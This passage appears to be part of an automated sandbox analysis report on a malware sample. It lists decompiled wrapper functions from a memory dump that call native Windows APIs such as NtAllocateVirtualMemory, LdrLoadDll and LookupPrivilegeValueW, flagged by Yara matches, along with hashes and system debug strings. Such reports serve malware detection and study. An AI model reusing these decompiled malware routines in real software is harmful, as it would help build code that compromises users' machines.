				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F3A(void* __edi, void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t23;

				_t23 = __edi + 1;
				_t11 = _a4;
				_t4 = _t11 + 0xc60; // 0xca0
				E0041A960(_t23, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x00419f3a
0x00419f43
0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c2cae57aaee24a481e8bf3b568ab94294137be15859ec3a95c4a17b099f9b3d9
Instruction ID: 6151ee63175769fd7de7b386ef41124cc57c16587030c0e0f1d920e5aff715eb
Opcode Fuzzy Hash: c2cae57aaee24a481e8bf3b568ab94294137be15859ec3a95c4a17b099f9b3d9
Instruction Fuzzy Hash: D8F01CB5200208AFDB14DF99CC80EEB77ADEF88354F15865DFA9997281C630E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E8B, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00419E8B(void* __esi, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _t16 ^  *(__esi + 0x55cf8bad);
				_push(_t17);
				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_push(__esi);
				_t4 = _t6 + 0xc50; // 0x40a923
				E0041A960(_t12, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}

0x00419e8b
0x00419e90
0x00419e93
0x00419e96
0x00419e99
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 100398fba52e7feea808e8bccf14b3dbf07a115ae67c9ec5509accb19f9d5474
Instruction ID: c9f6a35a11f8b28d2a18b47e172cff47c300e51633a10ff867553d80559cc8d5
Opcode Fuzzy Hash: 100398fba52e7feea808e8bccf14b3dbf07a115ae67c9ec5509accb19f9d5474
Instruction Fuzzy Hash: 66E08C75200308AFD710EB94CC85E977768EF48760F058499BA585B242C670F65086D0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 012C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C95DA

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f10302e087ceac64c71f35bd4f1098ad28a26e6edf94b24e99eb95aed77c929
Instruction ID: b1d630ee095d929a3856474a9173c80daf7db61bfe7a8df97cef9830a37524b4
Opcode Fuzzy Hash: 6f10302e087ceac64c71f35bd4f1098ad28a26e6edf94b24e99eb95aed77c929
Instruction Fuzzy Hash: 349002A125240403410571A98414616400AA7E0241F51C021E1004594DC56588917265

Uniqueness

Uniqueness Score: -1.00%

Function 012C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C971A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e108995b0ef253e67229a479c033c116e7bcd0168f7a2149a34b6bcb3fee4de7
Instruction ID: 88d8cce35e2584208b8865624c65778b4ab882e6ea0c2a723fbcfca207e9416d
Opcode Fuzzy Hash: e108995b0ef253e67229a479c033c116e7bcd0168f7a2149a34b6bcb3fee4de7
Instruction Fuzzy Hash: 5C90027125140802D10065E994086460005A7E0341F51D011A5014559EC6A588917271

Uniqueness

Uniqueness Score: -1.00%

Function 012C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C978A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1616a784c84ff14b202cabce9a694972135676bce24e525a092dc538bb354fed
Instruction ID: dbc636770b2f8b5db42e2420ccae2a4878c2953f4d7932b7f2a3cafcbe4f2f4c
Opcode Fuzzy Hash: 1616a784c84ff14b202cabce9a694972135676bce24e525a092dc538bb354fed
Instruction Fuzzy Hash: 2090026926340402D18071A9940860A0005A7D1242F91D415A000555CCC95588696361

Uniqueness

Uniqueness Score: -1.00%

Function 012C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C966A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 06db9b180e7ba0e8b28a69436e4e6650c1e2d2847e9f1db3e110bc39b9ba3eba
Instruction ID: 506e56b9bcfe15e3f0744bab58030b9614b531dab180a9ada08d4195ab2f5902
Opcode Fuzzy Hash: 06db9b180e7ba0e8b28a69436e4e6650c1e2d2847e9f1db3e110bc39b9ba3eba
Instruction Fuzzy Hash: 5290027125140C02D18071A9840464A0005A7D1341F91C015A0015658DCA558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 012C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C96EA

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc39dd936ba8ae21f197e387beea77835b7004d144801d1cf441b5958d9e1ef3
Instruction ID: 4e52ce27d8c00883349c5ecf380d72d8a418db47413e0bae90baa0add13ce92e
Opcode Fuzzy Hash: fc39dd936ba8ae21f197e387beea77835b7004d144801d1cf441b5958d9e1ef3
Instruction Fuzzy Hash: 0690027125148C02D11061A9C40474A0005A7D0341F55C411A441465CDC6D588917261

Uniqueness

Uniqueness Score: -1.00%

Function 012C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C991A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 069c6648be4ab67bc2188a016feefc7eb66b8e006fd29317296cb6a7dd075f8c
Instruction ID: b0e1b3599e32a7f7bc9652c5bdf0252f8b809ad55cdb335a688eb6b12122a484
Opcode Fuzzy Hash: 069c6648be4ab67bc2188a016feefc7eb66b8e006fd29317296cb6a7dd075f8c
Instruction Fuzzy Hash: 2A9002B125140802D14071A984047460005A7D0341F51C011A5054558EC6998DD577A5

Uniqueness

Uniqueness Score: -1.00%

Function 012C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C99AA

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bdfbe8e823b31e8bfc2598a674fbcc7ad7cf32e73ffb7cf4d91384cdd843b7f
Instruction ID: 73fa79811461d2377fcbbabbef1bec8d067c1e41ed5ce46ca2eca13fb42e120b
Opcode Fuzzy Hash: 5bdfbe8e823b31e8bfc2598a674fbcc7ad7cf32e73ffb7cf4d91384cdd843b7f
Instruction Fuzzy Hash: 109002A139140842D10061A98414B060005E7E1341F51C015E1054558DC659CC527266

Uniqueness

Uniqueness Score: -1.00%

Function 012C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C986A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 970c23ddcb222ed725dbae67781e80d74397ad2d97f8f53faf9d0443594654de
Instruction ID: 2d9b0ab41e7675c671ebbd86499de423415002aea4c429ce2a6a4d715d98e629
Opcode Fuzzy Hash: 970c23ddcb222ed725dbae67781e80d74397ad2d97f8f53faf9d0443594654de
Instruction Fuzzy Hash: A590027125140813D11161A985047070009A7D0281F91C412A041455CDD6968952B261

Uniqueness

Uniqueness Score: -1.00%

Function 012C9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C9A0A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c62af5a3be67b36d30a7f4fb059caec11f91b63f1265a11ba81ab27d4f62528
Instruction ID: 4351c4e91e253065df8ccfd20c8c582ae4a14370277d1951d7766904d7b06441
Opcode Fuzzy Hash: 2c62af5a3be67b36d30a7f4fb059caec11f91b63f1265a11ba81ab27d4f62528
Instruction Fuzzy Hash: 0E90027125180802D10061A9881470B0005A7D0342F51C011A1154559DC665885176B1

Uniqueness

Uniqueness Score: -1.00%

Function 012C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C9A5A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb609e5b7b5bef0f6aba76f83468c4983f332c8ab0fadbdc0a4bc69e2a869b65
Instruction ID: 75041080cd82855a848e1a1c12d49cad115c96b110e5765f2fc927e135456573
Opcode Fuzzy Hash: fb609e5b7b5bef0f6aba76f83468c4983f332c8ab0fadbdc0a4bc69e2a869b65
Instruction Fuzzy Hash: 4F900261261C0442D20065B98C14B070005A7D0343F51C115A0144558CC95588616661

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efcf0ab6665c7b0157fd04bcb744907f430064515781423b38bce05023b8fb6d
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: efcf0ab6665c7b0157fd04bcb744907f430064515781423b38bce05023b8fb6d
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1CA, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041A1CA(void* __ecx, intOrPtr* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				asm("int 0x6");
				 *__edi =  *__edi + __ecx;
				asm("adc eax, 0xec8b55e0");
				E0041A960(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ca
0x0041a1cc
0x0041a1ce
0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 131a6b07d639c62d6ddbb1ce3adc025a54b69d71e4c423c4e38fae939afdb419
Instruction ID: cdc875e40a44d32b62258e73030a2dee29117498ea5ba48aacb67c36d30eb2cb
Opcode Fuzzy Hash: 131a6b07d639c62d6ddbb1ce3adc025a54b69d71e4c423c4e38fae939afdb419
Instruction Fuzzy Hash: D4E09AB2200204ABEB14DF44CC80EE73369EF84360F018159F90CAB341C634E920CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a047
0x0041a05d
0x0041a061

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 012C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012C9694

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2805eafd7481c8de20878b6074dc0c18da6c8fac6f881ed27c2888aee3d56a21
Instruction ID: 3ddef91b2056f50abf441d2162e92c944eae1cd48516842761c6e5776e802b2e
Opcode Fuzzy Hash: 2805eafd7481c8de20878b6074dc0c18da6c8fac6f881ed27c2888aee3d56a21
Instruction Fuzzy Hash: A9B09B719514C5C9DA11D7B4460871779007BD0745F26C155D3020645B4778C0D1F7B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0133B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The resource is owned exclusively by thread %p, xrefs: 0133B374
The instruction at %p referenced memory at %p., xrefs: 0133B432
This failed because of error %Ix., xrefs: 0133B446
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0133B38F
<unknown>, xrefs: 0133B27E, 0133B2D1, 0133B350, 0133B399, 0133B417, 0133B48E
The instruction at %p tried to %s , xrefs: 0133B4B6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0133B323
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0133B314
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0133B39B
a NULL pointer, xrefs: 0133B4E0
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0133B2DC
The resource is owned shared by %d threads, xrefs: 0133B37E
write to, xrefs: 0133B4A6
The critical section is owned by thread %p., xrefs: 0133B3B9
Go determine why that thread has not released the critical section., xrefs: 0133B3C5
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0133B53F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0133B305
*** Inpage error in %ws:%s, xrefs: 0133B418
*** An Access Violation occurred in %ws:%s, xrefs: 0133B48F
*** enter .exr %p for the exception record, xrefs: 0133B4F1
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0133B3D6
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0133B2F3
read from, xrefs: 0133B4AD, 0133B4B2
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0133B47D
*** then kb to get the faulting stack, xrefs: 0133B51C
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0133B484
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0133B476
an invalid address, %p, xrefs: 0133B4CF
*** enter .cxr %p for the context, xrefs: 0133B50D
*** Resource timeout (%p) in %ws:%s, xrefs: 0133B352

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 7449db00206c58cc43aff109145fbfd27e236142ffb1559a5fedf7adf43524b9
Instruction ID: 2549a1d02d2fc1646b5997242db3665b7f73e6a4e10a24ac8db62a602320b9d5
Opcode Fuzzy Hash: 7449db00206c58cc43aff109145fbfd27e236142ffb1559a5fedf7adf43524b9
Instruction Fuzzy Hash: 26812775A50214FFDB266B4ACC46D7B7F2AEFDBA59F014048F5046B12AD2718401CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 012BC9BF, Relevance: 14.2, Strings: 11, Instructions: 412COMMON

Download Yara Rule

Strings

SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012FABF3
RtlpResolveAssemblyStorageMapEntry, xrefs: 012FAC27
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 012FAA1A
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 012FAC2C
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012FAAC8
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 012FAA11
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 012FAB0E
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 012FAC0A
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 012FAAA0
@, xrefs: 012FABA3
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012FA8EC

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
